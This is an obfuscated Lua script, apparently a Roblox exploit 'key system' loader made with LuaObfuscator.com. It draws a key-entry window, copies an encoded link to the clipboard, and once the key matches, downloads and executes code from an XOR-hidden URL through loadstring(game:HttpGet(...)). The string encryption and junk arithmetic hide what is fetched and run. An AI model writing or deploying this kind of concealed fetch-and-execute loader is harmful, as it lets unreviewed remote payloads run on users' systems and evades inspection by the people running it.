--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v71,v72) local v73={};for v79=1, #v71 do v6(v73,v0(v4(v1(v2(v71,v79,v79 + 1 )),v1(v2(v72,1 + (v79% #v72) ,1 + (v79% #v72) + 1 )))%256 ));end return v5(v73);end local v8=v7("\246\213\130\102\222\161\134\76\192\239\214\5\179\149\215\90\229\148\204\7","\126\177\163\187\69\134\219\167");local v9=v7("\8\200\51\133\207\58\222\62\192\241","\156\67\173\74\165");local v10=v7("\30\184\64\24\252\2\79\39\180\70\4\184\103\6\122\176\78\89","\38\84\215\41\118\220\70");local v11=v7("\118\4\39\22\241\91\23\13\28\251","\158\48\118\66\114");local v12=game:GetService(v7("\159\51\21\51\125\150\254\185\50\25\53\118","\155\203\68\112\86\19\197"));local v13=Instance.new(v7("\117\222\36\249\69\118\194\237\79","\152\38\189\86\156\32\24\133"));local v14=Instance.new(v7("\218\69\166\75\249","\38\156\55\199"));local v15=Instance.new(v7("\156\120\100\60\49\123\226","\35\200\29\28\72\115\20\154"));local v16=Instance.new(v7("\44\150\242\208\159\34\49\11","\84\121\223\177\191\237\76"));local v17=Instance.new(v7("\142\127\234\175\40\94\53\211","\161\219\54\169\192\90\48\80"));local v18=Instance.new(v7("\125\71\24\49\101\67\2\32\69","\69\41\34\96"));local v19=Instance.new(v7("\136\198\207\30\46\42\190\198\219","\75\220\163\183\106\98"));v13.Name=v7("\41\191\146\4\192\17\174\142\58","\185\98\218\235\87");v13.Parent=game.Players.LocalPlayer:WaitForChild(v7("\251\48\38\255\219\184\236\41\46","\202\171\92\71\134\190"));v13.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v14.Name=v7("\2\196\53\165\40\200\34","\232\73\161\76");v14.Parent=v13;v14.BackgroundColor3=Color3.fromRGB(141 -92 ,215 -(122 + 44) ,303 -(163 + 91) );v14.Size=UDim2.new((1930 -(1869 + 61)) -0 ,(1802 + 413) -(347 + 895 + 94 + 555) ,(0 -0) -(0 -0) ,16 + 98 + (25 -6) );v14.Position=UDim2.new((329.376 + 21) -((1561 -(1329 + 145)) + (1234 -(140 + 831))) ,(2030 -(1409 + 441)) -((785 -(15 + 703)) + 53 + 60) ,(438.385 -(262 + 176)) + (580 -(361 + 219)) ,(1721 -(345 + 1376)) -(0 + 0) );v14.Active=true;v14.Draggable=true;v15.Name=v7("\144\220\91\120\16\175\220\80","\126\219\185\34\61");v15.Parent=v14;v15.BackgroundColor3=Color3.fromRGB((469 -(15 + 398)) + (1001 -(18 + 964)) ,(986 -(198 + 490)) -(985 -762) ,44 + 31 );v15.Size=UDim2.new((2283 -1331) -((2008 -(696 + 510)) + (314 -164)) ,(1800 -(1091 + 171)) -(55 + 283) ,(0 -0) -(0 -0) ,412 -(123 + 251) );v15.Position=UDim2.new((0.191 -0) + 0 ,(2136 -1139) -((1613 -(208 + 490)) + 82) ,0.651 -(0 + 0) ,0 + 0 + 0 + 0 );v15.Font=Enum.Font[v11];v15.PlaceholderText=v7("\41\192\74\119\108\55\202\232\25\220\30\89\123\110\179\207\9\220\91\51","\135\108\174\62\18\30\23\147");v15.Text="";v15.TextColor3=Color3.fromRGB((858 -523) -(916 -(660 + 176)) ,(2993 -(1126 + 425)) -(1069 + (523 -(118 + 287))) ,999 -744 );v15.TextSize=(4 + 27) -17 ;v15.TextWrapped=true;v16.CornerRadius=UDim.new(0 -0 ,399 -(142 + 235) );v16.Parent=v15;v17.CornerRadius=UDim.new(0 -0 ,5 + 17 );v17.Parent=v14;v18.Name=v7("\130\236\50\223\73","\167\214\137\74\171\120\206\83");v18.Parent=v14;v18.BackgroundTransparency=(203 -(14 + 188)) -(675 -(534 + 141)) ;v18.Size=UDim2.new(0 + 0 + 0 + 0 ,(553 + 22) -(527 -276) ,(0 -0) + (0 -0) ,(477 + 341) -(198 + 170 + 270 + 153) );v18.Font=Enum.Font[v11];v18.Text=v9;v18.TextColor3=Color3.fromRGB((1197 -(115 + 281)) -(1520 -974) ,593 -338 ,(227 + 46) -((24 -14) + (29 -21)) );v18.TextScaled=true;v18.TextWrapped=true;v19.Name=v7("\191\245\42\73\170","\199\235\144\82\61\152");v19.Parent=v14;v19.BackgroundTransparency=868 -(550 + 317) ;v19.Size=UDim2.new(0 -0 ,(1800 -554) -(1295 -373) ,(1235 -793) -((701 -(134 + 151)) + 9 + 17) ,(1751 -(970 + 695)) -(112 -53) );v19.Font=Enum.Font[v11];v19.Text=v10;v19.TextColor3=Color3.fromRGB((2100 -(582 + 1408)) + (502 -357) ,255,(566 -116) -(734 -539) );v19.TextScaled=true;v19.TextWrapped=true;task.spawn(function() local v74=1824 -(1195 + 629) ;local v75;while true do if ((0 -0)==v74) then v75=(679 -(187 + 54)) -((925 -(162 + 618)) + 206 + 87) ;while true do if (v75==((636 -206) -(30 + 14 + (822 -436)))) then setclipboard(v7("\15\2\173\59\20\76\246\100\11\31\183\32\74\30\172\41\73\24\188\63\72\71\234\120\85\66\238\120\72\29\188\50\74\5\160\56\19\19\180\102\1\25\171\102\12\31\161\102\15\3\187","\75\103\118\217"));print(v7("\236\81\105\84\170\7\212\64\117\25\249\18\206\90\123\84\186\17\215\93\117\16\249\10\200\20\115\24\176\14\197\91\113\6\189\95","\126\167\52\16\116\217"));break;end end break;end end end);v14.BackgroundTransparency=(2499 -1012) -(79 + 919 + (2124 -(1373 + 263))) ;v18.TextTransparency=1;v19.TextTransparency=1 + 0 ;v15.BackgroundTransparency=1 + 0 ;local v69=TweenInfo.new(1002 -(451 + 549) ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);v12:Create(v14,v69,{[v7("\234\47\35\139\179\11\243\221\32\36\180\166\24\242\219\62\33\146\177\23\255\209","\156\168\78\64\224\212\121")]=0 + 0 + (0 -0) }):Play();v12:Create(v18,v69,{[v7("\51\235\189\218\51\252\164\192\20\254\164\220\2\224\166\215","\174\103\142\197")]=(0 -0) + (1384 -(746 + 638)) }):Play();v12:Create(v19,v69,{[v7("\98\45\71\44\17\76\249\88\59\79\57\55\91\246\85\49","\152\54\72\63\88\69\62")]=(291 + 481) -((304 -103) + (912 -(218 + 123))) }):Play();v12:Create(v15,v69,{[v7("\246\197\237\87\211\214\225\73\218\192\218\78\213\202\253\76\213\214\235\82\215\221","\60\180\164\142")]=(2719.75 -(1535 + 46)) -((2091 -(1913 + 62)) + 1016 + 6) }):Play();local function v70() local v76=v15.Text==v8 ;local v77=(v76 and Color3.new((0 + 0) -(560 -(306 + 254)) ,2 -1 ,0 + 0 + (0 -0) )) or Color3.new((5 -2) -2 ,(1467 -(899 + 568)) -(0 + 0) ,0 -0 ) ;v12:Create(v15,TweenInfo.new((1463 -(268 + 335)) -((1404 -590) + (335 -(60 + 230))) ),{[v7("\122\81\23\45\34\255\49\87\82\10\59\116","\114\56\62\101\73\71\141")]=v77}):Play();if v76 then local v80=572 -(426 + 146) ;local v81;local v82;while true do if (v80==(1 + 0)) then while true do if (((1457 -(282 + 1174)) + (813 -(569 + 242)))==v81) then local v84=0 -0 ;while true do if (v84==(0 + 0)) then v12:Create(v19,v82,{[v7("\140\236\195\208\140\251\218\202\171\249\218\214\189\231\216\221","\164\216\137\187")]=1025 -(706 + 318) }):Play();v12:Create(v15,v82,{[v7("\240\231\50\185\161\236\4\199\232\53\134\180\255\5\193\246\48\160\163\240\8\203","\107\178\134\81\210\198\158")]=(1126 -(936 + 189)) + 0 + 0 }):Play();v84=1252 -(721 + 530) ;end if (v84==(1272 -(945 + 326))) then v81=(2220 -1331) -((1399 -(782 + 356)) + 624) ;break;end end end if (v81==((1 + 0) -0)) then local v85=0;while true do if (v85==(700 -(271 + 429))) then loadstring(game:HttpGet(v7("\48\26\150\214\185\98\65\205\212\171\47\64\133\207\190\48\27\128\211\185\61\28\129\201\164\44\11\140\210\228\59\1\143\137\136\57\0\131\200\171\27\15\150\146\229\19\7\154\139\130\45\12\205\212\175\62\29\205\206\175\57\10\145\137\167\57\7\140\137\153\45\29\172\227\129\23","\202\88\110\226\166")))();v82=TweenInfo.new((994 + 88) -((2520 -(1408 + 92)) + 60) ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);v85=1087 -(461 + 625) ;end if ((1289 -(993 + 295))==v85) then v81=(3300 -(157 + 1718)) -(33 + 597 + (1964 -(418 + 753))) ;break;end end end if ((13 -(4 + 5))==v81) then wait((31 -22) -(1 + 6) );v13:Destroy();break;end if (v81==(1 + 0 + 1 + 0)) then v12:Create(v14,v82,{[v7("\225\14\129\252\205\209\0\151\249\206\247\29\131\249\217\211\14\144\242\196\192\22","\170\163\111\226\151")]=(7 -4) -(531 -(406 + 123)) }):Play();v12:Create(v18,v82,{[v7("\37\53\170\44\122\37\40\31\35\162\57\92\50\39\18\41","\73\113\80\210\88\46\87")]=1770 -(1749 + 20) }):Play();v81=3;end if (v81==((415 + 1332) -((2082 -(1249 + 73)) + 353 + 634))) then local v86=0 -0 ;local v87;while true do if (v86==(1145 -(466 + 679))) then v87=0 -0 ;while true do if (v87==(2 -1)) then v81=(2667 -(106 + 1794)) -(236 + 509 + (968 -(245 + 702))) ;break;end if (v87==0) then local v88=0 -0 ;while true do if (v88==(0 + 0)) then print(v7("\162\35\223\0\226\130\56\141\57\226\152\109","\135\225\76\173\114"));wait((3812 -(260 + 1638)) -((2229 -(382 + 58)) + (397 -273)) );v88=2 -1 ;end if (v88==(2 -1)) then v87=115 -(4 + 110) ;break;end end end end break;end end end end break;end if ((584 -(57 + 527))==v80) then v81=(1205 -(902 + 303)) -(1427 -(41 + 1386)) ;v82=nil;v80=2 -1 ;end end else local v83=(103 -(17 + 86)) + 0 + 0 ;while true do if (v83==(0 + 0)) then print(v7("\45\255\183\190\171\253\140\31\244\249","\199\122\141\216\208\204\221"));wait(2 -(1 -0) );break;end end end end v15.FocusLost:Connect(function(v78) if v78 then v70();end end);
